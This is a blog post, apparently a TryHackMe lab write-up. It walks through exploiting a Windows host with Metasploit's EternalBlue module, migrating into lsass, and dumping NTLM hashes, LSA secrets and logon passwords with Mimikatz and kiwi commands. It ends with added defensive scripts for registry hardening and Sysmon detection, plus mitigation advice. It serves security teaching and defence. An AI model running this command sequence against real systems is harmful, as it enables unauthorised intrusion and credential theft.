Credit: TryHackMe

Dumping Hashes with Mimikatz

Maruf Farhan Rigan
Published in System Weakness
5 min read · Nov 12, 2023

Mimikatz is a widely used post-exploitation tool that attackers use to steal authentication credentials held in memory on Windows systems. With this tool by Benjamin Delpy, an attacker can retrieve plaintext passwords, hashes, and other credentials from memory to gain elevated access and move laterally within a network.

I uploaded a video on my YouTube channel demonstrating how to perform those steps.

How Mimikatz works:

1. Pass-the-Ticket attacks:
   • Mimikatz can extract Kerberos tickets from memory. Kerberos is the default authentication protocol in Windows environments. By stealing these tickets, an attacker can impersonate a user and gain unauthorised access.

2. Pass-the-Hash attacks:
   • It can extract password hashes stored in memory. Instead of stealing plaintext passwords, Mimikatz can use these password hashes directly to authenticate and escalate privileges without needing the password itself.

3. Pass-the-Certificate attacks:
   • Mimikatz can also target authentication certificates stored in the Windows Credential Manager.

4. Golden Ticket attacks:
   • Mimikatz allows the creation of “Golden Tickets”, which are forged Kerberos tickets. These tickets can provide long-term, persistent access to a network.

5. Silver Ticket attacks:
   • Similar to golden tickets, silver tickets are forged tickets that allow an attacker to access specific services within a network.

6. Credential dumping:
   • Mimikatz has various modules that dump different credentials, including plaintext passwords, NTLM hashes, and Kerberos tickets.

It’s important to note that Mimikatz has legitimate uses, such as testing and hardening by security professionals. However, it has gained notoriety as a weapon in the hands of malicious actors because of its ability to abuse weaknesses in the Windows authentication system. Organisations rely on security measures such as endpoint protection and detection systems to defend against Mimikatz and similar tools.

1. Run nmap against the target IP with service version detection.

Once we know the service version, it's time to start msfconsole:

service postgresql start && msfconsole

search eternalblue

Type 1 (the default payload will be selected).

show options

We need to configure the target IP:

set rhost <target IP>

exploit

A meterpreter session has started.

After the meterpreter session has been established, we can try to get some information about the system.

Type sysinfo

1. getuid, then pgrep lsass, then migrate 788 (788 is the lsass.exe PID that pgrep returned here; use the PID shown on your target)
2. Load the kiwi extension: load kiwi
3. Open the help menu: help
4. creds_all
5. lsa_dump_sam (dumps the NTLM hashes for all user accounts on the system)
6. lsa_dump_secrets

cd C:\\

Let's create the Temp folder and upload mimikatz.exe to it:

mkdir Temp

cd Temp

upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

Open a shell session: type shell

dir

.\mimikatz.exe

Check privileges:

privilege::debug

privilege::debug requests the debug privilege (SeDebugPrivilege). It is required to debug and adjust the memory of a process owned by another account. User right: Debug programs.

If we want to dump the contents of the SAM database:

lsadump::sam

lsadump::sam dumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system or offline with backups of the registry hives (SAM and SYSTEM). It has the following command-line arguments:

The output also includes the SysKey, the SamKey, and the NTLM hash of each account.

lsadump::secrets

lsadump::secrets can be used to dump LSA secrets from the registry. It retrieves the SysKey to decrypt the Secrets entries.

Whenever a user logs in, if the system is configured to keep the password in memory in clear text, Mimikatz can show this password:

sekurlsa::logonpasswords
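Whether a cleartext password is kept in LSASS memory at all is decided by the WDigest registry value UseLogonCredential, and the related LSA Protection setting (RunAsPPL) stops an unprotected process from opening LSASS in the first place. The following Python script is an added example for this post, not code from the original article or from the TryHackMe room: it parses a `.reg` export of those two keys (the sample export is constructed for this example and shows the weak state), reports which values are weak, unset or hardened, and emits a corrected `.reg` fragment. The registry paths and value names are the real Windows ones; everything else is assumed.

```python
"""Audit a .reg export for the two LSASS-hardening settings that blunt
sekurlsa::logonpasswords-style dumping, and emit a corrected .reg fragment.
Registry paths and value names are the real Windows ones; the sample export
below is constructed for this example."""
import re

# (key, value name, hardened value, what the value controls)
HARDENING = [
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "UseLogonCredential", 0, "WDigest keeps cleartext passwords in LSASS memory when 1"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa",
     "RunAsPPL", 1, "LSASS runs as a Protected Process Light when 1"),
]

# Constructed export of a weakly configured host: cleartext caching on, LSA protection off.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest]
"UseLogonCredential"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Bounds"=hex:00,30,00,00,00,20,00,00
"RunAsPPL"=dword:00000000
"""

VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}.
    dword values are decoded to int; every other type is kept as its raw string."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, value = m.group(1), m.group(2)
            if value.lower().startswith("dword:"):
                value = int(value[6:], 16)
            keys[current][name] = value
    return keys


def audit(text):
    """Return one (key\\name, actual, wanted, status) tuple per hardening setting.
    A missing value is reported as UNSET: RunAsPPL unset means LSA protection is off,
    and an unset UseLogonCredential leaves the decision to the OS default."""
    keys = parse_reg(text)
    findings = []
    for key, name, wanted, _ in HARDENING:
        actual = keys.get(key, {}).get(name)
        if actual is None:
            status = "UNSET"
        elif actual == wanted:
            status = "OK"
        else:
            status = "WEAK"
        findings.append((key + "\\" + name, actual, wanted, status))
    return findings


def remediation_reg(text):
    """Build a .reg fragment that sets every WEAK or UNSET value to its hardened state.
    Importing it (and rebooting, for RunAsPPL) is the fix for the findings from audit()."""
    out = ["Windows Registry Editor Version 5.00", ""]
    for (_, _, wanted, status), (key, name, _, why) in zip(audit(text), HARDENING):
        if status == "OK":
            continue
        out += [f"; {why}", f"[{key}]", f'"{name}"=dword:{wanted:08x}', ""]
    return "\n".join(out)


if __name__ == "__main__":
    for path, actual, wanted, status in audit(SAMPLE_REG):
        print(f"{status:5} {path} = {actual} (want {wanted})")
    print(remediation_reg(SAMPLE_REG))
```

Run it against a real export (`reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa lsa.reg` and the WDigest key likewise) to see where a host stands; the fragment it prints is the hardened counterpart of the weak export, and auditing that fragment reports both settings as OK.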

Mitigation

Organisations should adopt a multi-layered security approach to mitigate the risks associated with Mimikatz and similar credential-dumping tools. Robust endpoint protection with up-to-date antivirus and anti-malware tools must be used, along with features such as Credential Guard on Windows systems; the principle of least privilege must be followed to limit access; and multi-factor authentication must be enforced. Regularly patching operating systems and software, implementing network segmentation, and establishing comprehensive monitoring and logging practices are essential. User education on phishing threats, strong password practices, and reporting suspicious activity is crucial. Additionally, disabling unnecessary services and protocols and having a well-defined incident response plan contribute to a holistic strategy for mitigating the risks posed by tools like Mimikatz.
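The monitoring the paragraph above calls for has two concrete signals for the steps in this walkthrough: the handle that sekurlsa::logonpasswords opens on lsass.exe (Sysmon Event ID 10, ProcessAccess) and the SeDebugPrivilege that privilege::debug exercises first (Security Event ID 4673). The following Python detection logic is an added example, not part of the original post or of the TryHackMe room: it runs two rules over sample events (constructed for this example, carrying the real field names of those two event types) and returns alerts. The allow-list of images is an assumed starting point, not a vetted baseline.

```python
"""Detection logic for the traces a Mimikatz-style credential dump leaves in
Windows telemetry: Sysmon Event ID 10 (ProcessAccess) against lsass.exe with a
read-capable access mask, and Security Event ID 4673 (a privileged service was
called) naming SeDebugPrivilege. Events are plain dicts carrying the real field
names of those events; the sample events below are constructed for this example."""

PROCESS_VM_READ = 0x0010   # the access right a memory dump cannot do without
LSASS_SUFFIX = "\\lsass.exe"

# Assumed allow-list of images that legitimately open LSASS or hold SeDebugPrivilege.
# Build the real one from a baseline of the estate; these entries are illustrative.
ALLOWED_IMAGES = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
}


def lsass_read_access(event):
    """Sysmon 10 rule: a non-allow-listed process opened lsass.exe with PROCESS_VM_READ.
    An 'UNKNOWN' frame in CallTrace means the caller ran from memory that is not
    backed by a file on disk, which raises the severity."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith(LSASS_SUFFIX):
        return None
    source = event.get("SourceImage", "")
    if source in ALLOWED_IMAGES:
        return None
    access = int(event.get("GrantedAccess", "0x0"), 16)
    if not access & PROCESS_VM_READ:
        return None
    severity = "critical" if "UNKNOWN" in event.get("CallTrace", "") else "high"
    return {"rule": "lsass-read-access", "image": source,
            "granted_access": hex(access), "severity": severity}


def sedebug_privilege_use(event):
    """Security 4673 rule: SeDebugPrivilege exercised by a non-allow-listed process
    (what privilege::debug does before touching another process's memory)."""
    if event.get("EventID") != 4673:
        return None
    if "SeDebugPrivilege" not in event.get("PrivilegeList", ""):
        return None
    process = event.get("ProcessName", "")
    if process in ALLOWED_IMAGES:
        return None
    return {"rule": "sedebugprivilege-use", "image": process,
            "user": event.get("SubjectUserName", ""), "severity": "medium"}


RULES = (lsass_read_access, sedebug_privilege_use)


def scan(events):
    """Run every rule over every event and return the alerts in event order."""
    alerts = []
    for event in events:
        for rule in RULES:
            alert = rule(event)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample: two benign LSASS opens, then the SeDebugPrivilege use and the
# read-access open that a dump from C:\Temp\mimikatz.exe would produce.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d8b4"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x100000",  # SYNCHRONIZE only
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d8b4"},
    {"EventID": 4673, "SubjectUserName": "jon", "ProcessName": r"C:\Temp\mimikatz.exe",
     "PrivilegeList": "SeDebugPrivilege"},
    {"EventID": 10, "SourceImage": r"C:\Temp\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d8b4|UNKNOWN(0000000000000000)"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The rules deliberately key on the access mask bit rather than on exact values such as 0x1010 or 0x1438, because tooling varies in the other bits it requests while a dump always needs PROCESS_VM_READ; the allow-list, not the mask, is where tuning against false positives happens.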


MSc in Cybersecurity | RA & Published Author, Blockchain | CompTIA Security+ Certified | Blockchain Fan | Cybersecurity Blogger | Tech Support @ Kaspersky Lab